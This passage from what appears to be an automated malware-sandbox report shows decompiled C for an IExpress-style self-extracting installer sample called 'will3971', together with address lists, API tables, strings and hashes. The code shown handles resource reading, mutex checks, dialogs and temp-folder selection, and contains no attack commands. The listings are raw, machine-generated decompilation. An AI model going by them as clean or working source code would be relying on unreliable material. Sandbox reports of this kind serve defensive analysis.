				}
				return 0;
			}

0x002f321b
0x002f321e
0x002f3221
0x002f343c
0x002f343e
0x002f343f
0x002f3445
0x002f3447
0x00000000
0x002f3447
0x002f3229
0x002f322a
0x002f322f
0x002f33ec
0x002f33f7
0x002f3410
0x002f3416
0x002f341d
0x002f342d
0x002f342d
0x002f3438
0x00000000
0x002f3438
0x002f3237
0x002f3243
0x002f3243
0x002f3246
0x002f32ee
0x002f32f4
0x002f32f6
0x002f33d4
0x002f33d6
0x002f33db
0x002f33dc
0x002f33de
0x002f33df
0x002f3370
0x002f3372
0x00000000
0x002f3372
0x002f32fc
0x002f3301
0x002f3301
0x002f3303
0x002f3304
0x002f3304
0x002f330a
0x002f330d
0x00000000
0x00000000
0x002f3313
0x002f3318
0x002f331a
0x002f3331
0x002f3332
0x002f333a
0x002f333d
0x002f337c
0x002f3388
0x002f338f
0x002f3394
0x002f3396
0x002f33a4
0x002f33ab
0x002f33b6
0x002f33be
0x002f33c3
0x002f33c5
0x002f3435
0x002f3437
0x002f3437
0x00000000
0x002f3437
0x002f33c7
0x002f33c9
0x002f33cc
0x00000000
0x002f33cc
0x002f33ad
0x002f33b4
0x00000000
0x00000000
0x00000000
0x002f33b4
0x002f3398
0x002f3399
0x002f339b
0x002f339c
0x002f339d
0x00000000
0x002f339d
0x002f334c
0x002f3351
0x002f3354
0x00000000
0x00000000
0x002f335c
0x002f3362
0x002f3364
0x00000000
0x00000000
0x002f3366
0x002f3367
0x002f3369
0x002f336a
0x002f336b
0x00000000
0x002f336b
0x002f331c
0x002f3323
0x00000000
0x00000000
0x002f3329
0x002f332b
0x00000000
0x00000000
0x00000000
0x002f332b
0x002f324c
0x002f324c
0x002f324f
0x002f32c8
0x002f32ce
0x00000000
0x002f32ce
0x002f3251
0x002f3256
0x00000000
0x00000000
0x002f3271
0x002f3277
0x002f3279
0x002f3298
0x002f329d
0x002f329f
0x00000000
0x00000000
0x002f32b0
0x002f32b6
0x002f32b8
0x00000000
0x00000000
0x002f32be
0x002f3280
0x002f3289
0x002f328e
0x00000000
0x002f328e
0x002f327b
0x00000000
0x002f327b
0x00000000

APIs

LoadStringA.USER32(000003E8,002F8598,00000200), ref: 002F3271
GetDesktopWindow.USER32 ref: 002F33E2
SetWindowTextA.USER32(?,lega), ref: 002F33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 002F3410
GetDlgItem.USER32(?,00000836), ref: 002F3426
EnableWindow.USER32(00000000), ref: 002F342D
EndDialog.USER32(?,00000000), ref: 002F343F

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F32E2, 002F32E7, 002F3331, 002F3344, 002F335B, 002F336A
lega, xrefs: 002F33F1

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$lega
API String ID: 2418873061-57479750
Opcode ID: 2875091d8dee984065bd8e127cf7d0482e34a128c306db7c91b74e5b29a4c33a
Instruction ID: 15e55740dc369d21aa74565da44f2ffac3ffebac95bbf70fd797a6856ad705ab
Opcode Fuzzy Hash: 2875091d8dee984065bd8e127cf7d0482e34a128c306db7c91b74e5b29a4c33a
Instruction Fuzzy Hash: 24512A7036124E76E721EF356C4CF7BE9489B86BE0F104034F70AD51C0CAE48A61E3A1

Uniqueness

Uniqueness Score: -1.00%

Function 002F2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E002F2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x2f8004; // 0x404cc811
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x2f9a3c = __ecx;
				memset(0x2f9140, 0, 0x8fc);
				memset(0x2f8a20, 0, 0x32c);
				memset(0x2f88c0, 0, 0x104);
				 *0x2f93ec = 1;
				_t20 = E002F468F("TITLE", 0x2f9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x2f858c = _t27;
					SetEvent(_t27);
					_t64 = 0x2f9a34;
					if(E002F468F("EXTRACTOPT", 0x2f9a34, 4) != 0) {
						if(( *0x2f9a34 & 0x000000c0) == 0) {
							L12:
							 *0x2f9120 =  *0x2f9120 & _t65;
							if(E002F5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x2f8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x2f8184 != 0) {
										__imp__#17();
									}
									if( *0x2f8a24 == 0) {
										_t57 = _t65;
										if(E002F36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x2f9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x2f9a34 & 0x00000100) == 0 || ( *0x2f8a38 & 0x00000001) != 0 || E002F18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E002F6517(_t57, 0x7d6, _t34, E002F19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E002F2390(0x2f8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E002F44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E002F468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x2f8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x2f9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E002F44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E002F44B9(0, 0x54b, "lega", 0, 0x10, 0);
										L11:
										CloseHandle( *0x2f8588);
										 *0x2f9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E002F44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x2f9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E002F6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x002f2cb5
0x002f2cbc
0x002f2cc7
0x002f2cc9
0x002f2cd1
0x002f2cd3
0x002f2cd9
0x002f2ce9
0x002f2cf9
0x002f2d0e
0x002f2d15
0x002f2d1c
0x002f2ef3
0x00000000
0x002f2d2d
0x002f2d34
0x002f2d3b
0x002f2d40
0x002f2d48
0x002f2d59
0x002f2d84
0x002f2e1f
0x002f2e1f
0x002f2e2e
0x002f2e41
0x002f2e5a
0x002f2e62
0x002f2e6c
0x002f2e6c
0x002f2e75
0x002f2e77
0x002f2e77
0x002f2e84
0x002f2e8b
0x002f2e94
0x00000000
0x002f2e96
0x002f2e96
0x002f2e9e
0x002f2ea2
0x002f2eba
0x00000000
0x002f2ece
0x002f2ede
0x002f2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x002f2eed
0x002f2eef
0x002f2eef
0x002f2eef
0x002f2eef
0x002f2ea2
0x002f2e86
0x002f2e88
0x002f2e88
0x002f2e43
0x002f2e48
0x00000000
0x002f2e48
0x002f2e30
0x002f2e30
0x002f2ef8
0x002f2f01
0x00000000
0x002f2f01
0x002f2d8a
0x002f2d8f
0x002f2da1
0x00000000
0x002f2da3
0x002f2dae
0x002f2db4
0x002f2dbb
0x00000000
0x002f2dca
0x002f2dd3
0x002f2df5
0x002f2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x002f2dd5
0x002f2dde
0x002f2de3
0x002f2e04
0x002f2e0a
0x002f2e10
0x00000000
0x002f2e10
0x002f2dd3
0x002f2dbb
0x002f2da1
0x002f2d5b
0x002f2d5b
0x002f2d5d
0x002f2d69
0x002f2d6e
0x002f2f06
0x002f2f06
0x002f2f06
0x002f2d59
0x002f2f18

APIs

memset.MSVCRT ref: 002F2CD9
memset.MSVCRT ref: 002F2CE9
memset.MSVCRT ref: 002F2CF9

Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
Part of subcall function 002F468F: SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
Part of subcall function 002F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
Part of subcall function 002F468F: LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
Part of subcall function 002F468F: LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
Part of subcall function 002F468F: memcpy_s.MSVCRT ref: 002F46E5
Part of subcall function 002F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 002F2DBD
CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2E0A

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Strings

VERCHECK, xrefs: 002F2E54
TITLE, xrefs: 002F2D09
EXTRACTOPT, xrefs: 002F2D4D
INSTANCECHECK, xrefs: 002F2D95
lega, xrefs: 002F2D04, 002F2DD9, 002F2DF0

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
API String ID: 1002816675-2051202908
Opcode ID: 84e3317380f27ae0efff4331ca07cb7184599341afc21cefc69cd2ff4936010b
Instruction ID: e18cf60199f76a843f010f76cfc983601390bbffdac88454521b5d1fed03b42b
Opcode Fuzzy Hash: 84e3317380f27ae0efff4331ca07cb7184599341afc21cefc69cd2ff4936010b
Instruction Fuzzy Hash: 0B51E47023030EEAE710AB24AC4EB7BE698DB837E0F504039BB45D51D1DBA498B5CA11

Uniqueness

Uniqueness Score: -1.00%

Function 002F34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E002F34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x2f91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x2f8584 = _t35;
					E002F43D0(_t35, GetDesktopWindow());
					__eflags =  *0x2f8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lega");
					_t17 = CreateThread(0, 0, E002F4FE0, 0, 0, 0x2f8798);
					 *0x2f879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E002F44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x2f858c);
					_t38 =  *0x2f8584; // 0x0
					_t25 = E002F44B9(_t38, 0x4b2, 0x2f1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x2f91d8 = 1;
						SetEvent( *0x2f858c);
						_t39 =  *0x2f879c; // 0x0
						E002F3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x2f858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x2f879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x002f34fb
0x002f34fe
0x002f3665
0x002f3666
0x002f3666
0x002f3668
0x002f366e
0x002f366e
0x002f3671
0x002f3671
0x002f3677
0x00000000
0x002f3677
0x002f3504
0x002f3506
0x002f3507
0x002f350c
0x002f365b
0x002f365f
0x00000000
0x00000000
0x00000000
0x002f3661
0x002f3512
0x002f3515
0x002f35be
0x002f35c1
0x002f35d1
0x002f35d8
0x002f35de
0x002f35f8
0x002f3617
0x002f3617
0x002f3623
0x002f3637
0x002f363d
0x002f3642
0x002f3644
0x00000000
0x002f3646
0x002f3652
0x002f3657
0x002f3658
0x00000000
0x002f3658
0x002f3644
0x002f351b
0x002f351d
0x002f354f
0x002f3553
0x00000000
0x00000000
0x002f355f
0x002f3565
0x002f357c
0x002f3581
0x002f3584
0x002f359b
0x002f35a1
0x002f35a7
0x002f35ad
0x002f35b3
0x002f35b8
0x00000000
0x002f35b8
0x002f3586
0x002f3588
0x00000000
0x00000000
0x002f3590
0x00000000
0x002f3590
0x002f3524
0x002f3535
0x002f3541
0x00000000
0x002f3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 002F3535
EndDialog.USER32(?,?), ref: 002F3541
ResetEvent.KERNEL32 ref: 002F355F
SetEvent.KERNEL32(002F1140,00000000,00000020,00000004), ref: 002F3590
GetDesktopWindow.USER32 ref: 002F35C7
GetDlgItem.USER32(?,0000083B), ref: 002F35F1
SendMessageA.USER32(00000000), ref: 002F35F8
GetDlgItem.USER32(?,0000083B), ref: 002F3610
SendMessageA.USER32(00000000), ref: 002F3617
SetWindowTextA.USER32(?,lega), ref: 002F3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,002F8798), ref: 002F3637
EndDialog.USER32(?,00000000), ref: 002F3671

Strings

lega, xrefs: 002F361D

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lega
API String ID: 2406144884-245445314
Opcode ID: 674c7ca7e0da49afe608532bbd126ca7e76409387fa39dc1e1d4602c37d5a8bc
Instruction ID: 329c23e25496b565b9f38e883cd761f6d48a6bc9cb4e317cf1e1f436e80733d9
Opcode Fuzzy Hash: 674c7ca7e0da49afe608532bbd126ca7e76409387fa39dc1e1d4602c37d5a8bc
Instruction Fuzzy Hash: 9531C874220209BBD7109F24BC4DE3BBA68E789BE0F504535FB0AD52A4CB718920CE55

Uniqueness

Uniqueness Score: -1.00%

Function 002F4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E002F4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E002F44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x2f88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x2f87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x2f8598;
					_v36 = 1;
					_v32 = E002F4200;
					_v28 = 0x2f88c0;
					 *0x2fa288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x2fa288(_t32, 0x2f88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x2f88c0 != 0) {
							E002F1680(0x2f87a0, 0x104, 0x2f88c0);
						}
						 *0x2fa288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x2f87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x2f88c0);
					_t61 = 0x2f88c0;
					_t4 =  &(_t61[1]); // 0x2f88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x2f88c0; // 0x5f1181
					_t44 = CharPrevA(0x2f88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x2f88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x002f4234
0x002f423c
0x002f4240
0x002f43b2
0x002f43b7
0x002f43c0
0x00000000
0x002f43c5
0x002f424c
0x002f4252
0x002f4257
0x002f43a4
0x002f43a5
0x002f43ab
0x00000000
0x002f43ab
0x002f4263
0x002f4269
0x002f426e
0x00000000
0x00000000
0x002f427a
0x002f4280
0x002f4285
0x00000000
0x00000000
0x002f428d
0x002f4293
0x002f42e6
0x002f42e9
0x002f42ef
0x002f42f4
0x002f42f7
0x002f4300
0x002f4307
0x002f430e
0x002f4315
0x002f431c
0x002f4322
0x002f4326
0x002f432d
0x002f432d
0x002f432f
0x002f4334
0x002f4343
0x002f4349
0x002f434d
0x002f4354
0x002f4354
0x002f435d
0x002f436e
0x002f436e
0x002f437d
0x002f4383
0x002f4387
0x002f438e
0x002f438e
0x002f4387
0x002f4391
0x002f4399
0x00000000
0x002f4295
0x002f429f
0x002f42a5
0x002f42aa
0x002f42aa
0x002f42ad
0x002f42ad
0x002f42af
0x002f42b0
0x002f42b6
0x002f42c2
0x002f42c8
0x002f42ce
0x002f42e4
0x002f42e4
0x00000000
0x002f42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 002F4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 002F424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 002F4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 002F427A
GetTempPathA.KERNEL32(00000104,002F88C0,?,00000001), ref: 002F429F
CharPrevA.USER32(002F88C0,005F1181,?,00000001), ref: 002F42C2
CharPrevA.USER32(002F88C0,00000000,?,00000001), ref: 002F42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002F4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002F43A5

Strings

SHELL32.DLL, xrefs: 002F422F
SHBrowseForFolder, xrefs: 002F4246
SHGetPathFromIDList, xrefs: 002F4274

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: ea54891e47fbd8e318947cb09ff0a9eb6be663ccbd6ec7ba37025343482e2ac2
Instruction ID: 616b5b670b247872f69e4da93c89d281a8d118681849c24aaa758036af3d1110
Opcode Fuzzy Hash: ea54891e47fbd8e318947cb09ff0a9eb6be663ccbd6ec7ba37025343482e2ac2
Instruction Fuzzy Hash: 4441C2B4A1020DAFDB11AF64EC98A7FFBA4EB463D4F5401B9EB45A2251CBB48C11C761

Uniqueness

Uniqueness Score: -1.00%

Function 002F44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E002F44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x2f8004; // 0x404cc811
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x2f8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x2f9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E002F1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E002F171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E002F171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E002F681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E002F67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E002F681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E002F67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E002F6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x002f44b9
0x002f44c4
0x002f44cb
0x002f44d8
0x002f44e4
0x002f44eb
0x002f44ee
0x002f44ef
0x002f44ef
0x002f44f1
0x002f44f7
0x002f44f8
0x002f467b
0x002f44fe
0x002f4509
0x002f4518
0x002f4525
0x002f4562
0x002f4568
0x002f4568
0x002f456b
0x002f456b
0x002f456d
0x002f456e
0x002f4572
0x002f4578
0x002f457c
0x002f45cb
0x002f4607
0x002f4607
0x002f460d
0x002f4613
0x002f4617
0x00000000
0x002f461d
0x002f4623
0x002f4626
0x002f4628
0x00000000
0x002f4628
0x002f45cd
0x002f45cd
0x002f45cf
0x002f45cf
0x002f45d2
0x002f45d2
0x002f45d4
0x002f45d5
0x002f45db
0x002f45de
0x002f45e3
0x002f45e9
0x002f45ed
0x00000000
0x002f45f3
0x002f45fd
0x00000000
0x002f4602
0x002f45ed
0x002f457e
0x002f457e
0x002f4580
0x002f4580
0x002f4583
0x002f4583
0x002f4585
0x002f4586
0x002f458a
0x002f458c
0x002f458f
0x002f458f
0x002f4591
0x002f4592
0x002f459b
0x002f459e
0x002f45a3
0x002f45a9
0x002f45ad
0x00000000
0x002f45af
0x002f45af
0x002f45bf
0x002f462d
0x002f4630
0x002f463d
0x002f464e
0x002f464e
0x002f463f
0x002f4640
0x002f4647
0x002f464c
0x00000000
0x00000000
0x002f464c
0x002f4666
0x002f466d
0x002f466f
0x002f4675
0x002f4675
0x002f45ad
0x002f4527
0x002f452e
0x002f453f
0x002f453f
0x002f4530
0x002f4531
0x002f4538
0x002f453d
0x00000000
0x00000000
0x002f453d
0x002f4554
0x002f455a
0x002f455a
0x002f455a
0x002f4525
0x002f468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
